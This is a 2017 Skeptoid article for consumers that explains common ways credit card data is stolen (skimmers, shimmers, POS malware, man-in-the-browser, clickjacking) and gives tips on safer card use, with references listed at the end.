How Your Credit Card Got Stolen
Here are the most likely ways that your credit card got stolen, and how you can prevent it in the future.
by Brian Dunning
January 17, 2017
That moment when you see a bunch of weird charges on your credit card or bank statement: Cigars in Brazil? Airline tickets in Nigeria? A tank of gas in Las Vegas? Someone has obtained your credit or debit card number, and now you're going to have to suffer months of updating it with all your utilities and other vendors. How did these thieves get your card information? Was it something you did? Should you have done something differently? Today we're going to look at some of the most common ways credit card numbers are compromised, correct some popular misinformation, and point out a few tips to more secure charging habits.
For this show, we don't really differentiate between credit cards and debit cards. From the perspective of keeping card info secure, there's very little difference. Either is just as likely to show up in a large database of card data that some thief acquired, and another purchased; that latter one is either making online charges in bulk, or he's printing up duplicate cards and selling and using those. What we're going to talk about today is how to minimize the chance of your card getting into that database in the first place.
One of the best known methods of stealing card numbers is a device called a skimmer. Skimmers are false card slot overlays affixed to the front of ATM machines, gas pumps, or anywhere you might slide your credit, debit, or ATM card. These take their own read off your card's magnetic stripe as you slide it into the machine. While skimmers used to be clumsy and easy to spot, today the best skimmers are seamless. They often incorporate an entire front panel of the ATM so that it looks factory fresh. Many of these also include a PIN pad overlay that captures your PIN as you type it. Most skimmers that don't include a PIN pad overlay use a hidden camera installed overhead or nearby to watch you type your PIN. Less familiar, harder to spot, and increasingly common, are "shimmers" — functionally the same as a skimmer, but thin enough to be inserted inside the card slot where they're not visible at all. Some skimmers and shimmers are retrieved by the thieves after collecting data for a time, and some transmit what they collect via bluetooth or some other wireless technology.
These days it's not very likely that a stolen database of card data came from an inside job at some financial institution. The payment card industry (PCI) has something called PCI Compliance, set by the PCI Council. They maintain the PCI DSS, or Data Security Standard, which is (in their words) "a set of security standards designed to ensure that ALL companies that accept, process, store or transmit credit card information maintain a secure environment." The standard is extremely rigorous, requiring a stringent set of both physical and electronic security measures. Any merchant that is fully PCI compliant is, by any practical definition, a safe place to use your credit card. Whether a company is PCI compliant or not isn't a matter of public record, but you can be sure that major online retailers like Amazon.com, and financial services companies like PayPal, are PCI compliant.
But independently achieving PCI compliance is far beyond the means of most small merchants. These companies usually go one of two ways. First, the safe way: they work with a third party credit card vault and tokenization provider that is PCI compliant. When you use your credit card at one of these online merchants, you type the card number into their online form (or if they're a brick-and-mortar store, you swipe your card at a terminal), but the card information never goes to the merchant at all; it goes directly to the third party. They store it safely and are the ones who actually process the transactions. The online merchant gets a token to reference each credit card: a long, unique alphanumeric string that will only work for that particular merchant. Since these merchants never have access to the credit card data, buying from them with your card has no practical likelihood of compromising your card.
The other way small merchants go is to simply take and process cards, and employ their own notions of security. Some merchant service providers will refuse to work with them, but others will, and often charge them a monthly fee that is essentially a fine for not being PCI compliant. This amount is usually a lot less than PCI compliance would cost them, so they do it. Whether your card is safe or not is a crapshoot. Fortunately the overwhelming majority of online transactions come from a small number of major merchants who are PCI compliant, so these sketchy merchants make up only a tiny slice of the total transaction volume.
There are a lot of people who say "Oh, I won't use my credit card online." Well, that's fine, and it's a good idea, inasmuch as never using or even having a credit card at all is the best possible defense. But probably most of these people carry their credit card around in their wallet or purse. They may even use it at restaurants or gas stations. Well, statistically, they happily use their credit card for all the riskiest behavior, and think they're somehow being safer by foregoing one of the safest behaviors. Using your credit card at a PCI compliant online merchant like Amazon.com is far, far, far safer than simply having your credit card in a wallet or purse that might be lost or stolen, or skimmed at every shop you visit. If you have a credit card, and only one choice of where to use it, choose online, not offline.
There are a lot of ways that your financial information online can be compromised that don't involve your credit card, and that unfairly contribute to distrust of online credit card use. This is a long, long list, and I don't really advise the layperson to try to learn about these, but rather to install security software from a top vendor such as Kaspersky Lab (totally not a paid endorsement, it's a genuine recommendation). To briefly describe a couple of these threats, and hopefully frighten you into protecting your computer, I'll talk about two.
One is called a "Man-in-the-browser" attack. This is trojan horse software that comes onto your computer just like a virus, and behaves like a browser extension that modifies certain web pages you look at. They are usually targeted at certain bank or online payment web sites. If you try to make an online payment through your bank, the man-in-the-browser will send payee information to the bank that's different than what you type. What you see on the web page will be what you expect, for example, a confirmation page that looks like you paid your utility bill; but what the bank was actually instructed was to send money to the thief, usually at some overseas bank. There are many, many variations of this.
Another is called "clickjacking", also usually targeted at online payment or shopping sites that it assumes many victims will have, and will occasionally be logged into. Clickjacking allows for something like a giant invisible button to be overlaid atop whatever web page you're viewing — and there are any number of ways such a layer can be injected into your browser's display of a web page — so that anywhere you click, it's hijacking that click and sending it instead to a "Buy Now" or "Donate Now" button that sends money directly to the thief from your default payment method at whatever site was targeted.
The lesson to learn from these types of threats is that while you're right to be concerned about your credit card, you're wrong to think that simply avoiding use of your credit card online makes your finances a whole lot safer.
Much of the reason for that is that most retail point of sale terminals run Windows and are connected to the Internet. As a result, they often become infected with POS malware. Thieves often design campaigns targeted at large retailers. Once a major retailer's terminals are infected, such malware collects card data, security codes, and even the valuable data from the magnetic stripe, called Track 2 data. Such malware has resulted in the theft of this data from hundreds of millions of cards all in one swoop. It is fatally naive to believe that using your card online is more risky than using it in the brick and mortar world.
So now, here are your 2017 Best Practices recommendations for credit and debit card users:
- When using an ATM, always choose an indoor machine over an outdoor machine. Thieves install skimmers on machines located in places where they can get away with it. Choose a built-in machine over a standalone machine. Be most careful on weekends and holidays when the skimmer installers know nobody's around.
- At any ATM or gas pump, give the machine a quick examination. Is there any loose plastic around the card slot, anything that doesn't appear to be original? Is there anything overhead that may have been stuck on, and may contain a camera? Is the slot tight, possibly indicating a shimmer?
- Whenever you put your card in and the terminal asks you "Debit or credit?", always choose credit. This doesn't affect the likelihood of your number being stolen, but it does affect your liability. With debit, you could lose your entire account balance and no one will pay it back to you (depending on how quickly you discover and report the loss); but with credit, your liability for fraudulent charges is either zero or very small, by law. Always choose credit.
- For your point of sale purchases, consider setting up Apple Pay, Android Pay, or Samsung Pay on your smartphone. Although no technology is 100% safe, these mobile wallets all employ single-use tokens to complete a transaction. No credit card information is ever present on the phone or in the transaction, and the tokens used immediately become worthless. Mobile wallets are unquestionably safer than credit or debit cards at the point of sale, and, like your phone itself if you've set up proper password protection, they're useless to someone who might physically steal the device.
- If you insist on using a plastic card, make sure it's a chip card, also known as an EMV card. The embedded microchip establishes a 2-way encrypted connection directly to the bank and employs single-use tokens; no card data is ever exposed to the merchant or to the network.
- Many cardholders have no reason to waste money on a special sleeve or wallet claimed to protect your card from remotely being read. Contrary to popular belief, neither magnetic stripes nor EMV chip cards incorporate anything that can be remotely or wirelessly read. Such protection only works with RFID dongles and RFID cards like PayWave, PayPass, and ExpressPay, which never really caught on in the United States. In some other countries, they're common. These cards use NFC (Near Field Communication), a subset of RFID, which can only be read from distances less than 5cm; thus in the real world, such theft is almost unheard of. Some researchers, however, have tested ways to access them from as far away as 20-90cm. But again, EMV and NFC cards are not the same thing! Your chip card is safe from this threat.
Of course there are many other avenues by which thieves get credit cards, including mugging you and taking it. You might type it into a web site over an insecure connection, you might fall for a phishing email prompting you to verify your credit card information. But no matter what you do, you'll never be 100% safe. Follow best practices, be as safe as is reasonable, and don't knock yourself out trying to prevent what is, for almost all of us, inevitable. Disputing some charges and getting a replacement card is not the end of the world.
By Brian Dunning
Cite this article:
Dunning, B. "How Your Credit Card Got Stolen." Skeptoid Podcast. Skeptoid Media,
17 Jan 2017. Web.
20 May 2018. <http://skeptoid.com/episodes/4554>
References & Further Reading
El Issa, E. "How Your Credit Card Numbers Are Stolen." Credit Cards. NerdWallet, Inc., 22 Apr. 2015. Web. 8 Jan. 2017. <https://www.nerdwallet.com/blog/credit-cards/credit-card-numbers-stolen/>
FTC. "Lost or Stolen Credit, ATM, and Debit Cards." Consumer Information. Federal Trade Commission, 15 Dec. 2012. Web. 13 Jan. 2017. <https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-credit-atm-and-debit-cards>
Krebs, B. "How Was Your Credit Card Stolen?" Krebs on Security. Brian Krebs, 19 Jan. 2015. Web. 8 Jan. 2017. <https://krebsonsecurity.com/2015/01/how-was-your-credit-card-stolen/>
PCI. "PCI FAQs." PCI Compliance Guide. ControlScan, 6 Apr. 2014. Web. 11 Jan. 2017. <https://www.pcicomplianceguide.org/pci-faqs-2/>
Penttinen, J. Wireless Payment and Access Systems, in Wireless Communications Security: Solutions for the Internet of Things. Chichester: John Wiley & Sons, 2016.
Schulz, M. "The Debit Card Danger You're Probably Forgetting." My Money. US News and World Report, 22 Sep. 2014. Web. 12 Jan. 2017. <http://money.usnews.com/money/blogs/my-money/2014/09/22/the-debit-card-danger-youre-probably-forgetting>
©2018 Skeptoid Media, Inc. All Rights Reserved. Rights and reuse information
Defusing India's Ancient Atomic Blasts
Deconstructing the Rothschild Conspiracy
Al-Ghazali and Arab-Islamic Science
Polybius: Video Game of Death
Locally Grown Produce
Chasing Malaysian Airlines MH370
The Siberian Hell Sounds
When People Talk Backwards